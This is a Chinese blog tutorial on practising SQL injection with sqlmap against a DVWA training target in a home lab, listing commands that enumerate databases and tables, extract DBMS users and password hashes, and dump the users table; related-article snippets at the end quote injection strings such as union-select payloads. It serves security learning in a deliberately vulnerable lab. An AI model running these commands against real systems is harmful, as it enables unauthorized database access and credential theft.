欢迎来到训练场,SQL注入DVWA靶机

最新推荐文章于 2024-04-29 20:54:11 发布
最新推荐文章于 2024-04-29 20:54:11 发布
阅读量986 收藏 8
点赞数 3
分类专栏: Linux 渗透测试 文章标签: 安全 sql 数据库 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35855737/article/details/106047221
版权

本文共有772字和12张插图,读完大约需要5分钟。

目录

1 简介

本文作为一个实验,练习一下sql注入。
本文共有670个字、12张图片,读完大约需要3分钟。

2 本文环境

一台CentOS7 32位 虚拟机,一台Kali 2020.1b 32位 虚拟机。CentOS上安装LNMP环境、DVWA,Kali虚拟机系统本身带有sqlmap。

3 登录DVWA

在Kali的浏览器上访问搭建好的dvwa,登录admin用户之后点DVWA Security,在下拉框中选Low,点Submit,在这里插入图片描述
点SQL Injection,点Submit
在这里插入图片描述
复制浏览器地址栏的URL
在这里插入图片描述

4 打开sqlmap

在Kali里打开Sqlmap,输入如下命令,

sqlmap -u "http://192.168.1.128/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=blb32d0eb5arnt0r80eloeblb1" --batch

检测到对方的DBM为5.5以上版本:
在这里插入图片描述

5 sql注入命令

5.1 获取所有数据库名

输入如下命令:

sqlmap  -u  “URL”   --cookie  “   ”  --batch  --dbs   //注入数据库

检测到对方的数据库名称
在这里插入图片描述

5.2 获取某数据库中的所有表名

输入如下命令:

 sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  --tables

获取到数据库名为dvwa中的表名:
在这里插入图片描述

5.3 获取到数据库管理系统的用户名和密码

输入如下命令:

sqlmap  -u  “URL”   --cookie  “   ”  --batch   --users  --passwords

获取到数据库管理系统的用户名和密码:
在这里插入图片描述

5.4 获取到某数据库中某表中的两列数据

输入如下命令

 sqlmap  -u  “URL”   --cookie  “   ”  --batch  -D  dvwa  -T users  -C  “user,password”  --dump

获取到名为dvwa的数据库中表名为users中的用户名和密码
在这里插入图片描述

5.5 获取到数据库中所有的表名

输入如下命令

sqlmap  -u  “URL”  --tables   //猜表名

获取到数据库中所有的表名:
在这里插入图片描述
输入如下命令

sqlmap  -u  “URL”  --columns  -T   //猜解列名

测试不成功,获取失败:
在这里插入图片描述

5.6 爆出某表中某列数据

输入如下命令

sqlmap  -u  “URL”  --dump  -C  “列名”  -T  “表名”   //爆出字段数据

测试不成功,获取失败:
在这里插入图片描述

6 附录

--dbs  //所有数据库
--tables //所有表
--columns //所有列
--users  //用户名
---count  //统计条数
--level   //测试等级 (1-5) 默认1  cookie  2   http 头3
小飞飞飞鱼
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入——pikachu靶场
cjh12340826的博客
07-20 618
(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data。10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示。6,detele注入使用hackbar(报错显示数据库)12,------- 基于报错信息获取---------然后使用hackbar点击post data发送请求。注册用户时注入,使用重发器(基于报错信息获取)7,http header和cookie注入。工具:burpsuit,hackbar。5,insert,update注入。在修改信息页面:提交修改,
SQL手工注入(MySQL数据库)详解---靶机(墨者学院)
CSDN_caiqian的博客
03-02 4386
SQL手工注入详解一、判断是否存在注入点二、Mysql数据库基本结构三、information_schema 简述 一、判断是否存在注入点 如果页面中MySQL报错,证明该页面中存在SQL注入漏洞: 单引号 ’ ----> 页面错误 and 1=1 ----> 页面正常 and 1=2 ----> 页面错误 二、Mysql数据库基本结构 MYSQL数据库   数据库A=网站A=数据库用户A     表名           列名              
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
最新发布
2401_84253132的博客
04-29 812
这样的话估计不能使用Error注入。结论:字段为2。
easy_cloudantivirus靶机SQL注入、命令注入、NC串联
qq_40898302的博客
04-28 187
端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权。
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4554
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
sqlmap对dvwa靶场的账号密码进行破解
m0_52934166的博客
05-16 1386
据此我们可猜测一下账号密码会在哪个表里(首先盲猜是在users表里,查看字段是找到账号密码的手段之一,一般账号字段为user,密码字段为password)后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动,当apache与mysql变成下图绿色后就行了。通过sqlmap继续查看dvwa库的所有表(可得guestbook表与users表)下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里。虚拟机搭建好后,相互ping能ping同就行。
k8s环境部署dvwa靶机
09-01
k8s环境部署dvwa靶机
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
靶机-佛山发发鱼喊access注入
05-09
靶机-佛山发发鱼喊access注入!很多视频教程中使用的靶机!默认含参数过滤,为了方便新人测试我已经去掉了参数过滤!
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1706
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
DVWA-SQL Injection(sql注入
MzHeader的博客
03-22 1549
DWVA-SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1273
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3309
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
sqlmap详细教程
简介
01-04 3132
SQLmqp教程!
DVWASQL Injection-----------------------low
qq_43665434的博客
02-25 308
DVWASQL Injection-----------------------low 1、初步测试 输入单引号报错 输入' and 1=1#回显正常,说明存在sql注入 输入' or 1=1#,遍历出数据库内容: 用order by测出主查询为两个字段 2、获取数据库名、用户名、版本 用union语句查询数据库名和用户名: payload_1:' union select database(),user()# payload_2:' union select 1,concat_ws('~',dat
dvwa靶机sql注入
08-04
DVWA靶机中的SQL注入是一种安全漏洞,攻击者可以通过构造恶意的SQL语句来绕过应用程序的验证和过滤机制,从而获取未授权的访问权限或者获取敏感信息。根据引用[1]和引用[2]中提到的内容,DVWA靶机中的SQL注入分为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值